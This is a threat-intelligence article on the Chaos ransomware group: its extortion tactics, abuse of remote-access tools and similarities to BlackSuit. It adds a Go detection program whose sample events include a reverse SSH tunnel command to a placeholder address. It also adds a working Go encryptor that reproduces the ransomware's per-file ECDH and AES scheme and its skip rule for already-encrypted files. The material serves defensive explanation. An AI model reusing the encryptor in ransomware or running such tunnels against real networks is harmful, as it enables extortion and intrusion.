
New ransomware group Chaos poses serious threat


The new Chaos RaaS group is emerging as a dangerous player in the ransomware landscape. Cisco Talos Incident Response investigated several attacks by this new group.

Chaos carries out so-called big-game hunting and double extortion attacks. Victims are not only held hostage through data encryption. The attackers also threaten to disclose the data. The attack chain often starts with large-scale spam, followed by telephone social engineering and the misuse of legitimate management tools for persistent access and data theft.

Chaos uses fast, selective file encryption and applies anti-analysis techniques that hinder detection and complicate recovery. Notably, the group appears to have no connection with earlier ransomware built from the Chaos builder; the name is probably being reused deliberately to sow confusion in the security community.

No specific sector targeted

Chaos’ victims are diverse and mainly located in the United States, with a few reports from the United Kingdom, New Zealand, and India; no particular sector appears to be targeted. Chaos advertises its ransomware on the Russian-language cybercrime forum RAMP and actively recruits affiliates. The software supports multiple platforms (Windows, Linux, ESXi, and NAS) and advertises features such as per-file encryption keys, high encryption speed, and network discovery.

The operators run automated control panels with an access model under which affiliates are paid out only after a successful attack. In their communications they state that they do not work with targets in BRICS/CIS countries, governments, or hospitals. Chaos publishes data from non-paying victims on its own leak site and does not state ransom amounts up front; victims are instead directed to negotiate via .onion URLs.

In one attack investigated, the group demanded $300,000 in exchange for decryption tools, a penetration test report, and a promise to delete data. If the victim does not pay, Chaos threatens a DDoS attack and reputational damage.

Wide range of attack techniques

Chaos’ attack methodology includes voice phishing, misuse of remote management tools such as AnyDesk and ScreenConnect for access, and legitimate file-synchronisation software such as GoodSync for data theft. Talos identified a wide range of tactics and techniques, including privilege escalation via token impersonation, registry key modification, and reverse SSH tunnels for command and control.
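The tooling above (remote-access clients, a sync client used for staging, and `ssh -R` reverse tunnels) all leaves traces in process-creation telemetry. The following Go program is an added example written for this article, not Talos detection content or anything from the Chaos operators: it runs two simple rules over a constructed batch of process events. The event format, host names, user names, and the 203.0.113.0/24 (TEST-NET) address are all invented for the example; the rules key on executable names and on the ssh `-R` (remote forward) flag while deliberately ignoring `-L` local forwards, which are common admin usage.

```go
package main

import (
	"fmt"
	"path/filepath"
	"strings"
)

// ProcEvent is a minimal process-creation record. The samples below are
// constructed for this example and are not real telemetry.
type ProcEvent struct {
	Host, User, Image, CommandLine string
}

// Finding pairs a rule name with the event that fired it.
type Finding struct {
	Rule  string
	Event ProcEvent
}

// remoteTools maps lower-cased executable names to the behaviour they indicate.
var remoteTools = map[string]string{
	"anydesk.exe":                     "AnyDesk remote access",
	"screenconnect.clientservice.exe": "ScreenConnect remote access",
	"goodsync.exe":                    "GoodSync sync client (possible data staging)",
}

// baseName extracts the executable name from Windows or POSIX paths on any host OS.
func baseName(image string) string {
	return strings.ToLower(filepath.Base(strings.ReplaceAll(image, `\`, "/")))
}

// reverseForwardSpec returns the -R argument of an ssh command line, if any.
// -R makes the far end (the attacker's server) able to connect back into the
// victim network; -L local forwards are ignored to keep false positives down.
func reverseForwardSpec(args []string) (string, bool) {
	for i, a := range args {
		switch {
		case a == "-R" && i+1 < len(args):
			return args[i+1], true
		case strings.HasPrefix(a, "-R") && len(a) > 2:
			return a[2:], true
		}
	}
	return "", false
}

// Analyze runs both rules over a batch of events and returns every hit.
func Analyze(events []ProcEvent) []Finding {
	var out []Finding
	for _, ev := range events {
		base := baseName(ev.Image)
		if what, ok := remoteTools[base]; ok {
			out = append(out, Finding{"remote-tool: " + what, ev})
		}
		if base == "ssh.exe" || base == "ssh" {
			if spec, ok := reverseForwardSpec(strings.Fields(ev.CommandLine)); ok {
				out = append(out, Finding{"reverse-ssh-tunnel: " + spec, ev})
			}
		}
	}
	return out
}

// SampleEvents is a constructed batch: three events that should fire, two that should not.
func SampleEvents() []ProcEvent {
	return []ProcEvent{
		{"WS01", "CORP\\jdoe", `C:\Users\jdoe\Downloads\AnyDesk.exe`, `AnyDesk.exe --install`},
		{"WS01", "CORP\\jdoe", `C:\Windows\System32\OpenSSH\ssh.exe`, `ssh.exe -N -R 8443:127.0.0.1:3389 user@203.0.113.5`},
		{"FS02", "CORP\\svc", `C:\Program Files\GoodSync\GoodSync.exe`, `GoodSync.exe /sync "Job1"`},
		{"ADM1", "CORP\\admin", `C:\Windows\System32\OpenSSH\ssh.exe`, `ssh.exe -L 5900:host:5900 admin@10.0.0.7`},
		{"WS01", "CORP\\jdoe", `C:\Windows\explorer.exe`, `explorer.exe`},
	}
}

func main() {
	for _, f := range Analyze(SampleEvents()) {
		fmt.Printf("%-50s %s %s\n", f.Rule, f.Event.Host, f.Event.CommandLine)
	}
}
```

In production these rules would be enriched with context the article highlights: a remote-access tool is far more suspicious when it is launched from a user's Downloads folder shortly after a burst of inbound mail, and an `-R` forward to an external address from a workstation should page someone regardless of who ran it.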

Chaos uses a hybrid encryption scheme that combines ECDH key agreement with AES-256. Each encrypted file receives its own key, and the encryption metadata is stored with the file. The ransomware skips system-critical files so the host stays usable, and it skips files that already carry the .chaos extension.
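To show why this design defeats recovery without the operator's private key, here is an added example in Go (1.20+ standard library only) of the general hybrid pattern the paragraph describes. It is illustrative code written for this article, not Chaos's encryptor: the header layout (`magic || ephemeral public key || nonce || ciphertext`), the P-256 curve, AES-256-GCM, SHA-256 as the key-derivation step, and the `HYBRID-DEMO` marker are all assumptions, and the partial or selective encryption the real sample uses is not modelled. Each file gets a fresh ephemeral ECDH key; only the operator's static public key is needed to encrypt, so the binary never has to carry anything that lets a defender decrypt.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/ecdh"
	"crypto/rand"
	"crypto/sha256"
	"errors"
	"fmt"
	"io"
	"strings"
)

// Constructed constants for this example; none of them are Chaos's real values.
const (
	magic     = "HYBRID-DEMO" // header marker
	extension = ".chaos"      // files already carrying it are skipped
	pubLen    = 65            // uncompressed P-256 point as written by Bytes()
)

var curve = ecdh.P256()

// NewOperatorKey creates the operator's static key pair. Only the public half
// would ship inside an encryptor; the private half stays with the operator.
func NewOperatorKey() (*ecdh.PrivateKey, error) {
	return curve.GenerateKey(rand.Reader)
}

// deriveFileKey turns the ECDH shared secret into a 32-byte AES-256 key.
// SHA-256 stands in for a proper KDF such as HKDF to keep this stdlib-only.
func deriveFileKey(shared []byte) []byte {
	k := sha256.Sum256(shared)
	return k[:]
}

// ShouldEncrypt reproduces the "skip already-encrypted files" exclusion.
func ShouldEncrypt(name string) bool {
	return !strings.HasSuffix(strings.ToLower(name), extension)
}

// Encrypt writes magic || ephemeral pubkey || nonce || AES-256-GCM ciphertext.
// A fresh ephemeral key per file yields a unique AES key per file with no
// per-file state kept anywhere; the header is bound to the ciphertext as AAD.
func Encrypt(operatorPub *ecdh.PublicKey, plaintext []byte) ([]byte, error) {
	eph, err := curve.GenerateKey(rand.Reader)
	if err != nil {
		return nil, err
	}
	shared, err := eph.ECDH(operatorPub)
	if err != nil {
		return nil, err
	}
	block, err := aes.NewCipher(deriveFileKey(shared))
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, gcm.NonceSize())
	if _, err := io.ReadFull(rand.Reader, nonce); err != nil {
		return nil, err
	}
	ephPub := eph.PublicKey().Bytes()
	var out bytes.Buffer
	out.WriteString(magic)
	out.Write(ephPub)
	out.Write(nonce)
	out.Write(gcm.Seal(nil, nonce, plaintext, ephPub))
	return out.Bytes(), nil
}

// Decrypt needs the operator's private key: the ephemeral public key in the
// header lets only that key holder recompute the shared secret.
func Decrypt(operatorPriv *ecdh.PrivateKey, blob []byte) ([]byte, error) {
	if !bytes.HasPrefix(blob, []byte(magic)) || len(blob) < len(magic)+pubLen {
		return nil, errors.New("not a blob produced by this encryptor")
	}
	rest := blob[len(magic):]
	ephPub, err := curve.NewPublicKey(rest[:pubLen])
	if err != nil {
		return nil, err
	}
	shared, err := operatorPriv.ECDH(ephPub)
	if err != nil {
		return nil, err
	}
	block, err := aes.NewCipher(deriveFileKey(shared))
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	ns := gcm.NonceSize()
	if len(rest) < pubLen+ns {
		return nil, errors.New("truncated blob")
	}
	return gcm.Open(nil, rest[pubLen:pubLen+ns], rest[pubLen+ns:], rest[:pubLen])
}

func main() {
	op, _ := NewOperatorKey()
	blob, _ := Encrypt(op.PublicKey(), []byte("constructed file contents"))
	pt, err := Decrypt(op, blob)
	fmt.Printf("operator key: %q err=%v\n", pt, err)
	other, _ := NewOperatorKey()
	_, err = Decrypt(other, blob)
	fmt.Println("wrong key:", err) // GCM authentication fails
	fmt.Println(ShouldEncrypt("a.docx"), ShouldEncrypt("a.docx.chaos"))
}
```

The practical consequence for responders is that parsing the per-file metadata tells you which curve and layout the encryptor used, which helps with attribution and with writing a decryptor once a key leaks, but it yields no key material on its own: the only recoverable inputs are backups and whatever the encryptor skipped.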

Analysis of the encryptor points to compilation dates in early 2025, indicating that operations started recently. The ransomware detects and evades analysis environments such as sandboxes and debuggers using hash-based identification of analysis tools and timing checks. The ransom note is stored XOR-encoded, decoded at runtime, and dropped as a text file.

Noteworthy are the similarities with the modus operandi of BlackSuit (Royal), including similar encryption parameters, ransomware commands, and ransom-note structure. These parallels reinforce the suspicion that Chaos is either a rebrand of BlackSuit or operated by its former members.